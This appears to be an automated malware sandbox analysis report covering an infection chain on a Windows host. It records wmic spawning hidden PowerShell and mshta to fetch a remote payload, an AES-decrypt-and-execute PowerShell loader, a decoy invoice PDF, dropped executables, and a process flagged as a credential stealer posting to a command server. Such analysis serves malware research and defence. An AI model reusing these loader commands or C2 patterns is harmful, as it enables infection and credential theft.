2024-12-21 14:00:13 UTC | 15331 | OUT | Data Raw: 82 94 59 4d be 5e e1 ab 73 5a 03 8b a9 bb b1 f7 47 f7 a2 87 4f 8f 26 49 78 ee 44 23 d2 87 bc f2 bf c6 d5 76 32 1c a1 94 00 89 59 d5 64 3b 59 6a fb dc bb e9 8a 3b d1 e6 31 78 11 82 9b ff 6c c0 df dc 1c 57 07 f4 cd 8c 42 ff ac 9a 80 33 1e 3c 09 02 9f 73 f3 be 4e 43 06 b1 11 75 65 5d 72 8e 9c b8 f0 0e 63 20 88 59 7a fe 00 6c 5e 15 a5 db bd 24 89 8c 8a 2e f1 ed 74 6a 17 ca d8 0f ea b7 ed 07 fc 6b 58 ee df 86 8d 71 d0 18 83 ac 44 18 95 eb 66 8c 99 d0 5f 6f c7 ea 3f 33 a2 55 b0 93 d5 d1 ac 23 24 9a 66 a8 db 3c e5 fe 5b 7c 85 f6 5f 91 aa e5 56 8a ea fa 6a 43 bf 70 f7 2d 34 ab 8b cf 2f cc 42 85 d3 cb 98 bf 5a 81 bb 54 3c bf 34 10 76 98 22 26 af bd 34 e6 e6 cc 2c 76 1b b7 0d 24 5a 7b d2 7d aa 2a 8e 17 f9 9f 65 5f c6 b1 01 63 ce cd 8e f9 b2 2a 58 3c 75 a2 7b e4 56
Data Ascii: YM^sZGO&IxD#v2Yd;Yj;1xlWB3<sNCue]rc Yzl^$.tjkXqDf_o?3U#$f<[|_VjCp-4/BZT<4v"&4,v$Z{}*e_c*X<u{V
2024-12-21 14:00:13 UTC | 15331 | OUT | Data Raw: 7d 62 6e d5 27 d5 66 87 2b 7b b6 62 98 ad 99 04 03 8f 5b c0 f3 7c 4c 4f a8 d7 b2 5c a2 7f cc b6 ab 14 ca 9c 5f 78 2c e1 d6 8a f7 d7 bf 92 e0 9f 35 6c 39 d5 8f 78 33 b3 8c 00 fb f8 a4 00 e1 27 64 0a e2 b3 5d fb 3b 15 7f f2 f3 02 75 15 63 b0 f6 20 13 27 d5 7b 1f 90 bf e6 f0 49 23 82 84 88 65 1d 86 3a 19 6c 95 0a fd c5 63 1e 82 fb 96 0a 3e d8 19 94 1c b0 2d 97 74 0c 36 e4 9e b8 f9 c2 0d 85 21 51 89 24 3d 1a 4f 0e 9b 82 18 a2 ab a2 c8 cb 22 41 ea af 49 05 49 ee 9c 0b 9d 71 48 ee 1e c6 82 5c 10 22 32 03 8a 2c 0e 94 18 fb b3 d8 87 68 f9 f4 dc e4 de 5a 8c df 11 61 03 c9 0c 91 ba 27 97 cb 6b c3 f9 a8 6e 6b 17 58 b5 f8 8d d3 c1 52 cf 37 35 e4 d1 e7 b3 aa fe 92 62 63 a3 08 31 b1 51 00 eb 42 4c 9b bc f5 06 2e 62 f7 ca f6 85 63 13 2a 30 30 b1 32 6f 44 5e e2 40 5a 11
Data Ascii: }bn'f+{b[|LO\_x,5l9x3'd];uc '{I#e:lc>-t6!Q$=O"AIIqH\"2,hZa'knkXR75bc1QBL.bc*002oD^@Z
2024-12-21 14:00:13 UTC | 15331 | OUT | Data Raw: 8a ad 51 9e 85 27 1d 63 7f a3 46 e7 bb 66 71 b2 e0 fb 9c f4 d4 8e 3c 63 b8 9f a5 85 46 51 32 3f b9 31 a8 40 e4 c1 1d bd 0b 8a 87 59 aa c6 15 0f b5 90 9f be 6d 39 13 01 89 78 60 1a 06 54 7a 43 11 f7 5f 58 4d 05 cf 0e 6c 69 2a fa b6 a2 a6 d8 be fb 80 92 12 02 fd 06 8e 5d 13 e0 f6 5c 38 57 7d 53 58 90 8b 2d 32 38 a6 de 26 2c 55 02 57 ab bd 14 c8 d8 97 a8 48 18 d5 2b 46 7d da 2e 75 e5 05 41 41 01 d8 79 d3 0d 85 93 d4 bc e2 d5 f9 bc 44 de 97 bb 9b 90 49 b4 37 d1 29 17 e1 ab 9f 66 78 bb 3c f8 7d c5 39 53 35 24 76 4a e4 76 c4 01 7a 98 8e c4 ea ab 39 93 dc 68 ad a1 c8 32 a7 25 59 1b 8b a2 a6 ec 1a 1f af 85 2a 80 12 40 0d ac 8c d4 cc 45 f8 fe 4e 59 39 62 14 fb ba 83 cf 32 91 e2 62 06 22 ad 28 52 fc 5c f4 ea 1e 46 bd 42 a6 26 32 58 af f9 0a 02 63 54 60 82 c2 57 ca
Data Ascii: Q'cFfq<cFQ2?1@Ym9x`TzC_XMli*]\8W}SX-28&,UWH+F}.uAAyDI7)fx<}9S5$vJvz9h2%Y*@ENY9b2b"(R\FB&2XcT`W
2024-12-21 14:00:13 UTC | 15331 | OUT | Data Raw: 35 10 2d 46 8b 07 6a b9 c9 65 0b 20 f7 f3 c1 56 ee 0d 8f 46 a1 ed 69 4e eb b3 8f ce 05 6d 21 a5 2a 97 fc b9 a2 b9 fd 45 6c 7c 7c 94 f4 d9 27 7d 7e a7 0c 7e 98 3f 85 c4 44 c5 2b 83 a5 1f fc 12 13 44 4b d4 c0 7e bc 50 11 95 41 bf 3e fd 24 9a 9a f7 de a1 31 c1 97 d3 c4 2e ed 5f 48 64 fa 7b 5c 93 ca a1 85 32 8b b2 d6 56 7f bc df bf 3d 77 a4 80 c9 ee 11 02 4d 57 c0 6d 24 9c 96 2f 04 ba 85 57 9c 1f 73 8c c6 be 45 bd 4c d3 ad d5 05 42 55 44 14 e8 2d 74 e7 59 54 32 9a 2e d1 3f 13 18 c0 ad d9 1f 79 64 b7 30 90 ad 49 b9 d2 79 3e dc d5 6f e7 9d 9f 50 f8 6d a1 04 29 60 7c ff b1 98 bc cd 36 40 38 9d 70 19 6f e9 28 4b cd 28 75 ff b2 b5 ec c4 71 fc bd 98 cc a5 ab ba 30 f5 5d 53 71 11 b7 0f 6f 05 d4 eb 22 48 6c cd 2f 15 b4 c1 c1 42 b2 18 3f 40 08 3d e9 a5 56 6f d1 bf 14
Data Ascii: 5-Fje VFiNm!*El||'}~~?D+DK~PA>$1._Hd{\2V=wMWm$/WsELBUD-tYT2.?yd0Iy>oPm)`|6@8po(K(uq0]Sqo"Hl/B?@=Vo
2024-12-21 14:00:17 UTC | 1135 | IN | HTTP/1.1 200 OK
Date: Sat, 21 Dec 2024 14:00:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=qajlt1ioebe1gg2fenn1vepl14; expires=Wed, 16 Apr 2025 07:46:56 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vr4CQNrQyhezgrrbKX9wnUV9cGLvQr8sV6Z4Hj1S543RfnA4orwpM8UZixOzMZGM5QSU6Ow1ZNJ6L0R17MSegSbBhr3ovFSbfdP7DzalsjhN%2FEMIbjjiCjy%2FC2NG5ngiAdGorw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f5865b05b8b1881-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1559&rtt_var=601&sent=213&recv=423&lost=0&retrans=0&sent_bytes=2842&recv_bytes=405711&delivery_rate=1798029&cwnd=238&unsent_bytes=0&cid=1de8169f1e0da491&ts=3701&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49871 | 104.21.16.1 | 443 | 940 | C:\Windows\SysWOW64\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-21 14:00:18 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 77
Host: securesways.click
2024-12-21 14:00:18 UTC | 77 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 41 42 31 35 67 31 2d 2d 26 6a 3d 26 68 77 69 64 3d 45 38 36 36 34 36 46 38 43 37 42 30 42 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
Data Ascii: act=get_message&ver=4.0&lid=AB15g1--&j=&hwid=E86646F8C7B0B95CAC8923850305D13E
2024-12-21 14:00:19 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Sat, 21 Dec 2024 14:00:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=6u5ee0nn10bojefcsjda4po31b; expires=Wed, 16 Apr 2025 07:46:58 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9J9eEK7aYI7iJArywP65FZ7gDIOeyLdzBHtppjdlpTs0n9%2B5dro2qRGVGd%2BIhNNylmbOF0M8w8sLYgHHsePK497Feh9GzNs3xLZKySBdVO9xt4FO0eDuXBdPU%2FvlzirXCWCdKw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f5865d02b990fa8-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1488&rtt_var=562&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=978&delivery_rate=1941489&cwnd=252&unsent_bytes=0&cid=dde63f602ff14591&ts=864&x=0"
2024-12-21 14:00:19 UTC | 54 | IN | Data Raw: 33 30 0d 0a 78 38 7a 4b 32 70 44 32 6c 48 6a 6b 79 51 68 46 4c 70 43 74 51 61 57 45 30 61 4c 66 7a 71 6b 79 57 6b 76 4c 53 35 6d 35 7a 55 36 63 6b 51 3d 3d 0d 0a
Data Ascii: 30x8zK2pD2lHjkyQhFLpCtQaWE0aLfzqkyWkvLS5m5zU6ckQ==
2024-12-21 14:00:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 08:58:56
Start date: 21/12/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie"
Imagebase: 0x7ff64d6b0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 08:58:56
Start date: 21/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 08:58:57
Start date: 21/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 08:58:57
Start date: 21/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 08:58:59
Start date: 21/12/2024
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplie
Imagebase: 0x7ff6d64d0000
File size: 14'848 bytes
MD5 hash: 0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 08:59:02
Start date: 21/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff7e52b0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID:7
Start time:08:59:03
Start date:21/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6)
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:08:59:03
Start date:21/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:08:59:08
Start date:21/12/2024
Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf"
Imagebase:0x7ff686a00000
File size:5'641'176 bytes
MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:10
Start time:08:59:10
Start date:21/12/2024
Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:0x7ff6413e0000
File size:3'581'912 bytes
MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:11
Start time:08:59:10
Start date:21/12/2024
Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,8685861103174925006,15707268363344924565,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:0x7ff6413e0000
File size:3'581'912 bytes
MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:15
Start time:08:59:19
Start date:21/12/2024
Path:C:\Users\user\AppData\Roaming\TCUINOVJ.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\TCUINOVJ.exe"
Imagebase:0x400000
File size:4'151'808 bytes
MD5 hash:38F517307990F8B2F9CEB8DE5BD1A528
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 30%, ReversingLabs
Has exited:true

Target ID:16
Start time:08:59:21
Start date:21/12/2024
Path:C:\Users\user\iScrPaint.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\iScrPaint.exe"
Imagebase:0x400000
File size:1'909'504 bytes
MD5 hash:098AC4621EE0E855E0710710736C2955
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\iScrPaint.exe, Author: Joe Security
Antivirus matches:
• Detection: 3%, ReversingLabs
Has exited:true

Target ID:17
Start time:08:59:23
Start date:21/12/2024
Path:C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe
Imagebase:0x400000
File size:1'909'504 bytes
MD5 hash:098AC4621EE0E855E0710710736C2955
Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 3%, ReversingLabs
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                              Start time:08:59:24
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                              Start time:08:59:24
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6068e0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                              Start time:08:59:43
                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              Imagebase:0xc00000
                                                                                                                                                                                                                                              File size:4'514'184 bytes
                                                                                                                                                                                                                                              MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2738358264.0000000003115000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2633160316.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000003.2665226023.000001C397AC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C397AC0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_1c397ac0000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                                                • Instruction ID: e2c5569f1b438eb97a90017bc84e4a54c5f7b4429757018b144fc799ee11e6c0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 329002154D550665E41515950C8569D90446389354FD884804426D4284D49D43D65196

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:17.7%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:25.9%
                                                                                                                                                                                                                                                Total number of Nodes:1474
                                                                                                                                                                                                                                                Total number of Limit Nodes:20
2 API calls 8397->8401 8400 40189c 8399->8400 8402 40eca9 VariantClear 8400->8402 8403 4018f1 8401->8403 8404 4018aa ??3@YAXPAX 8402->8404 8405 4018f5 GetLastError 8403->8405 8406 401906 ??3@YAXPAX 8403->8406 8404->8348 8405->8399 8406->8390 8602 40da56 8408->8602 8412 40a738 8411->8412 8413 40a66a 8411->8413 8414 40a687 8412->8414 8415 40a73d 8412->8415 8413->8414 8416 40a704 8413->8416 8417 40a679 8413->8417 8423 40a6ad 8414->8423 8515 40a3b0 8414->8515 8420 40a747 8415->8420 8422 40a699 8415->8422 8424 40a6f2 8415->8424 8416->8423 8489 40e69c 8416->8489 8418 40a67e 8417->8418 8417->8424 8427 40a684 8418->8427 8435 40a6b2 8418->8435 8420->8424 8420->8435 8422->8423 8503 40ed59 8422->8503 8498 40ecae 8423->8498 8511 40ed34 8424->8511 8426 40a71a 8492 40eced 8426->8492 8427->8414 8427->8422 8433 40eca9 VariantClear 8434 40166b 8433->8434 8434->8348 8434->8349 8435->8423 8507 40ed79 8435->8507 8438 401340 8437->8438 8439 40112b 2 API calls 8438->8439 8440 40134b 8439->8440 8440->8357 8442 4012f7 2 API calls 8441->8442 8443 401462 8442->8443 8530 4013e2 8443->8530 8445 40146d 8445->8361 8447 403037 8446->8447 8453 401804 8446->8453 8448 403048 8447->8448 8449 40303b SetLastError 8447->8449 8450 403051 8448->8450 8452 40305f FindFirstFileW 8448->8452 8448->8453 8449->8453 8533 402fed 8450->8533 8452->8450 8454 403072 FindClose CompareFileTime 8452->8454 8453->8384 8453->8385 8453->8386 8454->8450 8454->8453 8456 40ec65 8455->8456 8457 40ec86 VariantClear 8456->8457 8458 40ec9d 8456->8458 8457->8352 8458->8352 8460 4024fc 2 API calls 8459->8460 8461 403375 8460->8461 8462 40112b 2 API calls 8461->8462 8465 403385 8461->8465 8462->8465 8464 4033d3 GetSystemTimeAsFileTime GetFileAttributesW 8466 4033e8 8464->8466 8467 4033f2 8464->8467 8465->8464 8474 403477 8465->8474 8574 401986 CreateDirectoryW 8465->8574 8468 40301a 22 API calls 8466->8468 8469 401986 4 API calls 8467->8469 8479 4033f8 ??3@YAXPAX 8467->8479 8468->8467 8482 403405 8469->8482 8470 4034a7 8471 407776 55 
API calls 8470->8471 8477 4034b1 ??3@YAXPAX 8471->8477 8472 40340a 8580 407776 8472->8580 8474->8470 8474->8479 8475 40346b ??3@YAXPAX 8480 4034bc 8475->8480 8476 40341d memcpy 8476->8482 8477->8480 8479->8480 8480->8382 8481 401986 4 API calls 8481->8482 8482->8472 8482->8475 8482->8476 8482->8481 8599 40db3c 8483->8599 8487 40112b 2 API calls 8486->8487 8488 401311 8487->8488 8488->8395 8490 4012f7 2 API calls 8489->8490 8491 40e6a9 8490->8491 8491->8426 8519 40ecd7 8492->8519 8495 40ed12 8496 40a726 ??3@YAXPAX 8495->8496 8497 40ed17 _CxxThrowException 8495->8497 8496->8423 8497->8496 8522 40ec65 8498->8522 8500 40ecba 8501 40a7b2 8500->8501 8502 40ecbe memcpy 8500->8502 8501->8433 8502->8501 8504 40ed62 8503->8504 8505 40ed67 8503->8505 8506 40ecd7 VariantClear 8504->8506 8505->8423 8506->8505 8508 40ed82 8507->8508 8509 40ed87 8507->8509 8510 40ecd7 VariantClear 8508->8510 8509->8423 8510->8509 8512 40ed42 8511->8512 8513 40ed3d 8511->8513 8512->8423 8514 40ecd7 VariantClear 8513->8514 8514->8512 8516 40a3c2 8515->8516 8517 40a3de 8516->8517 8526 40eda0 8516->8526 8517->8423 8520 40eca9 VariantClear 8519->8520 8521 40ecdf SysAllocString 8520->8521 8521->8495 8521->8496 8523 40ec6d 8522->8523 8524 40ec86 VariantClear 8523->8524 8525 40ec9d 8523->8525 8524->8500 8525->8500 8527 40edae 8526->8527 8528 40eda9 8526->8528 8527->8517 8529 40ecd7 VariantClear 8528->8529 8529->8527 8531 401398 2 API calls 8530->8531 8532 4013f2 8531->8532 8532->8445 8539 402c86 8533->8539 8535 402ff6 8536 403017 8535->8536 8537 402ffb GetLastError 8535->8537 8536->8453 8538 403006 8537->8538 8538->8453 8540 402c93 GetFileAttributesW 8539->8540 8541 402c8f 8539->8541 8542 402ca4 8540->8542 8543 402ca9 8540->8543 8541->8535 8542->8535 8544 402cc7 8543->8544 8545 402cad SetFileAttributesW 8543->8545 8550 402b79 8544->8550 8547 402cc3 8545->8547 8548 402cba DeleteFileW 8545->8548 8547->8535 8548->8535 8551 4024fc 2 API calls 8550->8551 8552 402b90 8551->8552 8553 40254d 2 API calls 
8552->8553 8554 402b9d FindFirstFileW 8553->8554 8555 402c55 SetFileAttributesW 8554->8555 8570 402bbf 8554->8570 8557 402c60 RemoveDirectoryW 8555->8557 8558 402c78 ??3@YAXPAX 8555->8558 8556 401329 2 API calls 8556->8570 8557->8558 8559 402c6d ??3@YAXPAX 8557->8559 8560 402c80 8558->8560 8559->8560 8560->8535 8562 40254d 2 API calls 8562->8570 8563 402c24 SetFileAttributesW 8563->8558 8567 402c2d DeleteFileW 8563->8567 8564 402bef lstrcmpW 8565 402c05 lstrcmpW 8564->8565 8566 402c38 FindNextFileW 8564->8566 8565->8566 8565->8570 8568 402c4e FindClose 8566->8568 8566->8570 8567->8570 8568->8555 8569 402b79 2 API calls 8569->8570 8570->8556 8570->8558 8570->8562 8570->8563 8570->8564 8570->8566 8570->8569 8571 401429 8570->8571 8572 401398 2 API calls 8571->8572 8573 401433 8572->8573 8573->8570 8575 4019c7 8574->8575 8576 401997 GetLastError 8574->8576 8575->8465 8577 4019b1 GetFileAttributesW 8576->8577 8579 4019a6 8576->8579 8577->8575 8577->8579 8578 4019a7 SetLastError 8578->8465 8579->8575 8579->8578 8581 401f9d 19 API calls 8580->8581 8582 40778a wvsprintfW 8581->8582 8583 407859 8582->8583 8584 4077ab GetLastError FormatMessageW 8582->8584 8587 4076a8 25 API calls 8583->8587 8585 4077d9 FormatMessageW 8584->8585 8586 4077ee lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 8584->8586 8585->8583 8585->8586 8591 4076a8 8586->8591 8590 407865 8587->8590 8590->8479 8592 407715 ??3@YAXPAX LocalFree 8591->8592 8593 4076b7 8591->8593 8592->8590 8594 40661a 2 API calls 